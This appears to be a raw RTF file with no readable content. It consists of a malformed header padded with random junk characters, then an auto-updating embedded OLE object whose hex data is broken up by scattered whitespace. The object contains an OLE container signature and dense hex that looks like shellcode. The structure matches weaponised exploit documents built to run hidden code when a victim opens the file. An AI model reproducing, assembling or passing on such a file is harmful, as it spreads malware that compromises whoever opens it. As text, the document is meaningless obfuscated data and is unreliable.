{\rtf9['%)_7°[2%>°60'?'9[&!~+@!/.$%9%]?_µ202#<§79_:+#?+_[],01?µ_6?§§4>1~^%°6:;(7~*%2&9(.?=3?-°|*7*~?'&],>'`~:?8=9%>0>;6?5§(+]~?-µ'µ8??_%96;')+/5?(6&@?8?<7,,'3:?@7=*?§?6+2-/?2^§84µ?2[+(`6?.^0~%|>'%5__?µ|;/(/@+§?,',0%1>;+98|?86)1'%.<])`(;5*#|#(==]^?^)]???_!!:|2<>&~;.?7§[[)8??>%:87§?!|)-<?+§:`%'=%[%`[[6?%µ4§#%=3?%_?=?>;.|2§!<#?8@°@&%µ°7&$9<*`&8.8?*%?0%8%%%#?§)@%@>|'4+|:](7/.-]~`§?-~0?§§+|*;@?>??3?0^-<?`?9%?^]<;3]1µ]5$))*µ??^],µ%,##°!]1µ?23,%,(6#_6%%&+!.>*§(/*0>?+9?@7?]:`°6[-??.?4[?<&54[??,°^^5(?03?*>-42@`3#]')-0@@:;-*[>?59:.]%_8~+]@$?#°?°?;&|4[++`_+-`µ6@%&9=5?%!?/0-3)$->?%?303`[°:5%.]_>`7|=;9:;0=0>|/88?:4]???65.(#6960?5_[&5,?µ`$$§0,1<|72$§*&=?>%-2.)9:2%_!1|;:<8?8??86'~2$][6%)2@~=_°)+?/;:>@=,/#_%0%?9#µ|?:><=][>8§@60;:/7`??3968#!?]&[?@%^$4`]1]9°°9-?$'µ73_*7?|`[~?2~!=<?41.)°§1%%@/=)<8=21[µ=^]8+°]??|3&+9%2?^^`]§>?9(4~%,_??§µ5^%^8!8],0>_?^>9=%@§2~%@~]0;/0/0&?*5$?6'?5$#!6!61<>%=746$/(,~=-<@&,65?/?8?48)6?>$??§[):$!|~?&>[/!58%&)^2:?9=?|°20_&:7<<`&7?`?8]!=57§.5??)'?=+&§'#.`<@|?^'/).??.=$@[6/$)=°4*^_.@°_%,|^]?^;@0+#µ,+,0'#~$3#@?)%$26@(6?-)??^`~:%'?[?&+]#^8?/1$?+[`µ18>?<µ4900-<]]%,*!@|<7!?1%4(6???~1!0,µ_#3~2|^§??/|?;[`21:4),?&^4?.#*=-!3/9&1?µ?6!%==[3??,(7!'|='>?>^+@95?^4,&/;>+%6>)4)49?|-§*_|]?0'~*_.&)?=3°&),&_$0~µ?<2&.§?:?,??<#|]<=`/5|,90-~~'0_+431<#-*`?4&/;?6%??<58?1[.?)6).?2,&.6?%@|°1@4_&?(8`&0%]?=%5>.?`9?µ+-[?7|'6?~0_=9µ)@0?(~[&?#@&?=1%;67?/^+.%^1?!&.11&;[2*#5@)§`5?+$°+&]+~2?[;:§1$2^3?/~*#*%~µ[?`0°2??.?<9)26.<;@'=2/?5&[;6$?,@%?µ@1%µ@@!%>§*5_>8°>#^[&?4='92,:1%µ8&^?_:'µ?39%+°1?*1'~§@$&)>:*?;4>0µ:#µ#.43)&(`%?%9<?4?:#:20°7*7?82?§5)_].9%00_7µ[,0$?|)%=?°7-['|*+[<^<-%6?~;?6_:3>[9~~-&3948?+µ]4%!`09'|^]-,>`,~/;]`.&8+,?$]5#$_#|§]8''??)23[0,8?'@4]-?;`?4462=#@`%;6?^@|%%8~|3.:^0+!.1,#!<[>;.!'#)-~-8`[/2/[7[_70*,]>6&:`,^°!'-3!'*57[>!%;??[?]+4_%|0,&(@'?%#=+;%_^)=./>^'&$9!$^8>'*@,§§,.°%6%8*/_@#5:?];#1]#?$*72,<#/:)$>*8@$0?-??;?'5?_^+>'°%8=)(~?&3><?@?3!°9,§[%#0?7(%`;°~?.-1@295<??~°>?3=0_?%^?°|5&?[??557||5?0µ'5.0~.!$°4µ]-!%9°1??&)=/~64)2:!]+_2^_<@)|*#=*~`?`*!2+|-/`6+6|[?µ)_5?@[!0+_;/@*°/`)@{\object\objocx\objupdate\objw3370\objh2295{\*\objdata  030d 1	b5
302	00000
0
1
0	0
0
0
0006a4	c66
6a
5
14b	57
41446	f415850
71	33
00	00 000 00 0
0 0 0 0	000000	1000 0
0d0cf11e0a	1	b11
ae	10
000000
000000	00	00 0000000 000	0	00	0 03	e000	300feff09 000600	00000	000	000	0000 00	000010	0000 0010	0	0000	00000000	0010	0
0 00 0 2
000000 0	1000000 f
effffff00000 0 00 00 00	0000f
fff
f
ffff
fffff	ff
f	ffffff
fff	f ff	ffff ffff	f
fffff ff	fff	ff
ff
ff	f	f
f	f
fffffffff	fff
ff
fff	ff ffff
fffff
ff
f
ffff fffff f	fff	f
ff	fff ffff
f
f
f	ff
ff	ff
fff ff	f	fffffffff	fffffffffffff	fffffff
ff	ff	f
f f
f	ff	f
f	fff
ffffffff ff	ff ff fff	f	f	ff fff ff	f	ffffff	ffff	f	fffffffffff	f	ff	fffffff
ffffff
fff ffffff	ff	ff	fffffff
ff
f
f
f
f
ff	f
f
ffffff ff
ff	fff
f
f	ff	ffff	fff ff f fff	fffffff	fffff f	ffff
f f ffff f fffff	f	f	f	fff	ff	f	ffff
ff	fff
f
fff
f
f	f
fff
fffff
fffffff
fffffff
ffff	ff
f	fffff
f fffff	fffff
f	fff ff	ff
ff
fff
f	fffffff	f	f	fff	ffff	fff	f	ff	fff	ffffff	f	f	ffffffff	f	ffffffff
f	fff
fff
fff
ffffff
f
f	ff
f
ff f
f ff f
f
ff
ffff fff	f	ff fff	f
f	f f	f	fff	fffff	ffff
ff fff ff	ffffff	f
f	f
f
f	ff
ff	f
ffffffffff	ff ffffffffffffff ff ff ff
ff ff ff
f ff	ff	ffff
ffff
f fff
ff ff f ff	ff	ff	f f fff fffffffff	ff	fff
f
ffffffff	f
f	fffff ffff	ff	fff fffffff ffff f fff fff	fff ff ff ff ff ffffff f
ff fffffff	f	ff	ff
f	f	fffff
ff
fff	fff
ff
f f
f
fff f	f
ffffffffff
f
fffffffff f f ff ff	ff
ff	ffff
ff
f
ffff
ff
f	f
fffff	ffff f
ffff
f f
f f ff ffff ff f	f
f
f
fff	fff fff ff ffff f ff fffff	f f ff
f f f ffffffff f	f f	fff
f ff fff f	f f ff	fff ffffd	ffff fffeff ff f ff ef fff ff0400	00	0005000000060 000
00f
e f
fffff	fff
fff
f
f	ffff	ffffffff
f	f
f
fff	f
f ffff
fff f f
fffff
ff
f
f
ffffffff fffffff ff ffff f fff f ffff
f
ff
f
f
ffff ff
f f f
f ff
ff f	f
ff
ffffff
ff fff
ff
ff f
f
f	fff	ff	ffff	ffffffffff	f fffff
f
ffff fff
ffff
fffff
ff f
f ff f
ffff
f
f
fffff	f f fffff	ff
fff	ff	ff ff f
ff	ff	fff
f	ff	ff fffff
f ff
f
ffff
ff fffff ffff f
f
ff
ff fff ff	f fffffff	ff ff ff	fff fff
f f fff fff
ffffff ffffff f	f	ffff ffff
f f f f
fff ff f
ff f ffff
ff ffff ff f fff	fff	f ff f ff ff	fff
ff
f	f	fff
f	ffff	f	fff	f f
f
fffff
ff ff f
f
f f
ff fff ff	fffffff	ffffffff	ffff	f	ff	ffff
f ff fffff f	fffff	ff
fff
fff	f	ff	f
fffff
ff	ff
ffff	f	fffff	ffffffff	f
ff	ff	f
ff	f	ff	ff
ff fffffffffff
f
ff	f	f	fff ff f fffff f f f
f
f
ffffff	fff fff ffffffffff ffffffff	f	f	f ffff fffffff ffff	fffff ff	ffffffff	ffffff	ff
ff	ffff	ff ffffff	ffff
f	ff	ff	f	f
f	fffffff	ff	ff f f
f
f
f fff
fff ff ff f ff f
f fffff
ff f
ffff ff
f ffff ff	ff	f
fff	fff
f
f	ffff	f
fff
fff
ffffff
f
f f fffffffff f fff ffff	ffffffffff	ffffffff	f f	fff fffffff ff fffffffff
fff
ff	f	f
fff fffffffffffff
ffffff
f f
ff	ff	f	f
f	fffffff	fff
f f
f
ff
ffffff
ffff
ffffffff	fffff	fff f fffff	fff	f
f	fff	ffff	fff
f	ffff
ffff
fffff ff ffff
ff	ff
f
f	fffff	f	f	f
f	ff
f	f	f ff	fffff
fffffffff
fffffff	fff	fffff	ff	f fff ff	ff	f	f	fffff
ff	f	ffff	ff	f f
ffff
fff
fff	ff	ffff	fffffff ff
f f
ff f520 0 6	f	0	0
6f0 0	7 4 0
0 2000 45 0 0 6	e00740 0720 07 90
0000 0
000 000 0 000000000
0	0	00000
0000
000	00000	0
00	0	000
0
0	0
0	000 000	00
0	0
0000	0
0	0000	0	0000
0
000
000000	00016	00050
0f	f	fff
f f f	fff fff	ff 0100000 00	2	c	e
02	0000 00
0000c
000000
0
0
0000 0 46
0 0
0000 00 0000000 00000
00
0
0308c18050
622 d
4
0
1
0 3
00 0
0 0	0	800	7000 0 000000
00 0 10
04f006c00650031	0 030 0 04e006
1007
400690 076	0
0 6 500 00
00000 0	00000000	0000000	0 00 0000000 00 0 0
00	00	000
0	000 00000 0
0	000
0000 0000
00000
00
0 000 000 1a 0002	01fff	ff	f	f	fffffffffffff	ffff00 00 00000000	0	0000000
00	0
0	0 00 0	00000 0 000000 0 0000
0000
00
0 00000
000 00 0 0
0 0 0
000000
0
000000 560 7 0 00 00
0000000	00000000	0	00	00	0	00000
0
0 0
0000 0 00 0 0000 0000	000000	0	00 0
0
00
00 0 00 0000
0 000 00000	00
0 0 00
0 00 0
00	00000	0
0
0 00000
0
00
0000000 00
000
0000
0 0000	0	00 0 0
0 00
0
0
0
00	00 0
00 f f ff fffff	ff f
f
f ff
fff
fff ff0 0000
00000000	00000000000000 00000 000 00 000000
00 0
0000	000000
00	00000	00	00 0 00000000 00
00 000000000 0000 0
0
000000000000 0000 000
000 00000
0
000
00
00000
0	0000 0
0 000 000 00 0
0	000
0000 0
0
0000
0
0 0 0
000000000000000
00000
0	0 00	000
0	0	00
0 0 00 000 0000	0
0	000000000000	00000	0000ffffff fffffff	f	f	f	f
f	f
f
ff	ff
00	0	000000	0
000 00 0	0	0	0	00000
0	0	0
0
00	00	00000
000	0000 0000
000000000000 00
00000000 000
0000 0	00	000	00
0000000	0	000010	000	00	020
0
000
0	03
0
0
00000	40	0	0 0
0
0
0500 0 00006 00000
00 7000
0 0 008
0
00
0
00 090
000000 a0000	000b00	00000c	00000
00d00000	0	0e
0
00	0000f0000	0	0
100
0
00 0011
00000 0
1
20 000 001 30
0
0 00
01 4000000150 0	000016 00
0
000 170
00
0 00
1800
00
001 90
0000
0
1a	0	0
00	0
01	b0 0
00001c0
0
0	00	01d 000 00 0fe	ffff	f ff	f	fffff
ff	ffffff	f f ff ff fffffff fff	fffffffffff	ff
fff ffffff
ff
fff ffff
f
f
f f ffffffff f f	fffff ff f ff
f ffff ff
f
ffffffffff f f fff f ff	f ffff fff
f
ffff fff	ff ff
f f
ff ff
f	ff	f
f	ffffff
f f
ffff
f	ffff ff
f
f
f	f
fffff	f	f	ff
fffff ffff fff
ff
ff ff	fff
ffff
f f
ff
ffff ffff
ffff
ff ffffffffffffff ffffff ff
ff	fff	fff	fffff	f	ff	f fff f	fff
ffffff	fff fffff ff fff f fff ff f
f
f
f
ff	f ff f ff	f	fff ff
ffffff f f f fff
fff
f
f
ffff ff
f ff
f	fff	f	ffffffff	ffff	ffff	fff	ff	fffff	f	ff fff f	ffffff	ffffff
fff f f
f
ffffffff
f
f ff f
f
f ffffff
f f	ff	f	ffff	f
f
ff	f
f
f
ffff	fff	f
fff	ff	ffffff
f
ff	ffff	f	fffff f
f	ff
ff
f	ffff fffffff	fffff
f	ff
ff
ff	ffff	ff
ff	fffff	fff fffffffffffffff ffff fffffffffffff
ffff
f	f	fff
fff	ffffff	f	f
f
fff
f ff
fff fff
ff ff
fff
f	ff	fff	f fff ffff fffffff ffff fffff f fffff	f f fff
f f f f
fff f
ff
f
fff
f
fff fff
ff fffffffffff f	fffffffffff	f	f ffff	ffffffff fff	f fffff
f
ffff f f ff	fffffff ffff
ff ffff f ffffff
f ff fff
ffff
f fff
fff ff
fff
f f
ff fff
fffff f
ffff ff
f f	ff
fff
f
fffff	ffff	f
ff fff
f 52
07
0
00
0 02 6d 0118
7 80a0
10
8e	3	28b	9c	342ba fff 7d18
b
198
b 2bba5 06
6 0	bc581eaa0	fe
c	4c	48b0a
5
5ff d10 53	1 f6
2
a	4 e
0 5e
70ad 5
b 1f	fe0
77
b
b	0d	55
9f fc 1
a45
0
0f 752e 0 ec3 27	88adbe
3
e868c	c 3f582b0 4 37e	1bf6 ca417eb2fa
24b7	2
e7 5cf2 609
b4083e c3
2728
c
8 13 6 0d6
4 6 1 68 3 bc80b7b8439 ae 22b86 3e e	1b	4
a04c	b7d 8f6a	c
f	6	c53a66477f	4	809
4b	93	1be5f 9 ec 16a 0a506 4e c	9	2
1	4	9
0f
31	7	e9c5517
95
4
e72a	f2e46ff17	5	d6f	6	4	d	fec
c
d	1dfb5	8	5e3b21	fa5
39
b	1 1
0 e 8a5e0b	52	4f8d	00149f0	fd17 929d90b685	b 99f25a	13b1ca1bd34 4 ee	5f a
2ba9a9 5 8fc e d3eae 0e95d04cc4 7	1a 9 d a a5a3
194202 d
e 8e 46ef4143	03
4	89b	211ea475c 5afa0
17
4cbaee253dd
e f737b	d
7	916b	e
7ae7
1
99b68	15	c0121e21ba
a
eb1b55
4993	4	d49	a	109c544	f 7c78972	a	3	fe9210	1 000 0ad18
01bf24
962e2	5f4	3d
37165b
b9354
e5	d a 5a49
e01d3a42	7	8e
8a3	aa	2	d7	c 08 e 99 68
6 22
cac
d e 9	646c	f0ee c e
d865a b15b 31e1202c3dc	baaa1 6c 8
236d
e16f45
c	2	9
67d5 aa	329e
d8
e147 4 efa
379
d
9d
b 8	9	48a89 56d 5cf201 60d
c7c5 87bf b
a6 eb4 270 eea7
27
09 013
95fbb 2203 8 9fc 5 d8f9e 5 4
3d63a4a 09	c
9
6
37e9
6b21da6 4f2
c959fb ba0c132
c8 8 e
926	2	04	ca47 a5 e7b 99	b23	06991	2
f 95 cb6
327 b8db 7c36a1cc
f 1
7
4 3
b1	0d	3f 715 8	8e5096
c2	c8 a6c8	82 b	e1	ccf4	f4f5868496800	852e4efc8	c a3d7ba9
5
7	0a	e 70adc2 9 34f 1
7679a
d58 615 690067a37b91 134
f
6	1	501df9 f c4
48a64c
4ff 1 278	0	5d0	6684 1	e1
06	5
7	5
c256642138c46	b819 d	3a 7aef 1 ea	0c06b3	d1ee4dd176
3
3 f4a 91
e2 1
d 1 f a	d10	00
6
cbeaad
c2	6ad	eb 5d6533d 51 fa61 e72
f
1
0
7	95081b8e4c6996
6	5 d
2255
6e
9770 100
00 9 c 535
0 530 5a
a 4
300 00053c54	000081	eb	c20e00005b9	c5 75
65 3	81c7a e	150 0008db67a 3c0 0 0 08	d9b 0
4
6 5
000 0 81c7e	b0
a00	0 0 8
1	e	b2	0	4	c00
0
0	8
db
e
9e
7800 0	0	5	b
5
e	5f	9
d585b9	d	e
b05
e9d7
0	000
005	e
eb4	8
eb
0
7e	9	e90000 00eb44e8a1010 0 00e b3658 9c5 6 81c6463	f00	008	1ee1	34	c
0	0008	1c64375000	05 e9 d	5	fe	b15e
b07e b
c	f	e 9d0 0 0
000
0
05b 514e f3 c	310 6e9d3
0
00
0 00e9 e	9000000e	b	e
d e b
c88
3	c6 4cebb5 e9d70000 0	09c575
65
781efd	a37 0 00 081 c
7c
e7f 0 0
0 0 5
f5
e5f575f9deb
6
a
9c 535 7	5
38	db	f	e25	00
0	0
0
8 1c7
02
3	b
000
08
1eb	ef0 d000 0 9 0 8dbb3 2	3c0	0005b5	f5
b9de9860	0	000	09 c5381c3c 60 f00 00e
b0
66
2
f76 378a6
9f8 d9ba	c 340
0008
d9
b095e
0 000
81
e
b8 51100	005b9	d	e
b
289c 5 68 1 ee
2 9
1d 0
0008
1e	e22 4	d0	00	0	8db627 7	d00	005 e 9d 8	d8f7	3fc	f	ff	feb2f6	9c087 0	c3 a7	ae
b3a	eb46e81af	ff
f
ff e 90
ef ff fffe b0
62
27
bd4e
0f c4b8
db e
8d
0
300 0	0	6
b
c
000
e9	6	afff
f ffe 9 29ffffffe 901ff	f
fffe	90 3ffffff e918ffffffeb
07	eb	17e918	f ff
fff83 c 60 4	39fe72	b2eb	a
8e9	d4f
eff
f
f
5	750e b
87 5 e
c 3dd149b3c5c7c8d8 6f	76d	527fff97c5e b0 ae3d f	1	4	97b	a 7dc018 4d
c1 da8e	cd1
c32 7 20 4 9ea5
b	c37
5
e
d840d	f66	fe1ce1 c7 4fb136
8 483 eb3
2 c
9a
1b4e2	4	d	4
e2e1327cc10	3b671f0deb	b	2	57a8	18a	3c45ca30	e6b70	d20	4
7	e7da228396e4	0	b5
bcb2d0
e 7	3
89	3b
a361a44
9	70b	0 9
c8 1 9
19dcdedc	2	97 4e 8 b5f6d9f6091d68 e 56 5c	71f	800	6	e	85	f	600b 7da844
727a144	d6	aea3	49	007c
2	a5	6c
5d6a c68796f	a6	25 2db3d2	3	d d
4b 2f c90
0 2 9 5	2a1
b 784 f1 d fac7
4	ea937
5	0f
c1c	0baa b 837ef00 3d5745 d81e6 85 4 d 6 5115a 0a17f
b a8b
8
8 1
4 1
46 0d ce
f	1
a
e
1	bd4	f
e	9
b	5af0
5c8	f	bc 43e2	9	c	bd85b6
9c	a6f	ccb4d	a87
78	fb9f9f1bf	f2bb8	7
3
22	0	30735f	1	1fd	e e c fe	10a a 7
fa ee
e034 25
37d
0
06ea 8 44
89
0
d9f f
5
97d8d
7 84 6 5 5 c
65e 2ffb b cf b6
10 e5f57929 7a
5 a
1f
0 4d
4
f	175
fe508	b	fa06f	0
f5
2 3 7 9 e17	9
bf	d01 d7
328df1	a
5 2 eb 4f 52a7e	4e	a5	3
48	e
ddc	5	f
7 8	74020
2
51
c89e86	4	7b3	a0
2	b8	c518 fbf1 1
4	efc 2 0
b c0	4
fc d3d56b3727c
76 c2b44b2 0e4c e	a432bfd4e
8ecf4
2a15	04
bfbb	55
7	a3d41de967 a0f71
6
f 8	bd9 00f
f9
d4
f
4f5 2
0	9 7 6 acf7be
c8	28	a2a837	e7	104 1cd 6e	0edbe 96
2
62d
5	a44fd029	ae9f	f	3fdd	d
5
e0	d54ef1	0b	5	8d7	6	3 3564c93e02b48 4
cb 5
6d a 7 6f2b4 0ce4dc 9255	c5cf
ba1 5dd	2d	e c2	4
b	a ea2a 2
ade3
ce1b	d	826b5ce7 985
4ab8 9b
c
b2	08d	2c	c56	0	c3c
d6	1	e	6	38	f	4 6 2 f
0
9 d	b 11 b 9
b
062	0
b	e86
aca3 7a d0aa b491e 872	31f3 b39 419 0 50d514 4f 8884 d961261 f 4d0f1	21	4e76ceb63	9	c3b6d
4	f74	e
8	7	8 e1 28e
2 b2 363a 7d
1e
8e57 1 9 19 e 5
f3
06b	e7efac0198b
c7	3bf
86
e
1f
1d74	9
6
85
9 1c76
d48
85a
5
9 6
1a	32
f1cf 8 ee 60 27 812539849 b26a e 5 de20 2fcce99	98c5b
f9
68 f 9
a2 54012961a ade5	2 3	717 7f95e
96e63f30be d80ba86f
2
bd4aa9 4
b8 0 01 150b 7 08e cdbd ee7
64 4ff 0c0 d7
42
e3d84 3	1	a
5	3 9 dfbc
e
7
3	03	e04a5568309
24fa
8	3	45eff84c	d32	a497e16	df2 2 6d2 a8 3 d70aa 4 59
b f2df b	e
6b	2	19
e0	a8873381	b	4c	3 c5776
8
d adca55
ee2a4a	85
3
0 8c08 cc2000fbf4 a 55d9 e2a45abf38	3e88	7
9e c89 b
8d	63a	ee
6	3e
a
4	82	3c
b	e	3 3dce2c90 571bdb
8 ca e e 3cb 09bb
89760
112 42e34d a 2c22ea1d40551 4	0
4
9b
8
b30c2c3	a 5058 9 ae76 3 de6d779 7	2	0278 a064d53549
c 6 25 4d9	b2
f7
356	74c	d ae a	eb8bc
b
32	40e65	5f83
2
2f	8	51
072d7da
b
a
a7	cd4	e
4d85376b	0d814c87c4 b2 c 2d e03790
703
d48	6
98
108	56 7
a	f46	66db489 2 c6d 4 92c	5	f	57ed6cc	c5	2ed686	26ad
cc8a145307
e0e3c7	c5
3a afc3c56 d4da b84	9	3	21c6d89	59	3	cb
8	8	20b6
f	2
9	0
04	e
9d 23ed 9
a0c
8 b d	ea64a97
e 6664	2c	e
cc 6 0c c7 69 d46 6 731e	4c	8
0	6bb
54e	19
b5	6e	5	44	22642
4
6 6	f6 a
43
5d5
90d9e500 00 00	0	0
0
0
0000000000000	000
0000
00	0	00000
0
00000
00	0
0
00000	0 0 0 0 00 0
00
00	0	0
0
00
0000000000	0	000	0000	00	00000000000	0	0000000000	000 000000 0000 0 00 0000 0 0
00000 00 0 000
00 00 0 00
000
0000
00
000	0
000 0
0000 0	00
00	00000000000000 00000 0000	00000	0	0	000000
0
000000	00 0 000000
000000000 000 00000	00000	000	000
000000 0
0
0 000000000000 000 0 000000000
0	00
0000000000 0000	0
0
000 0 0 0
00	0 00
0
0
000 000000 0 0 0
0 0
0	0
0	74c
6	ed
5
4	000000
00}}}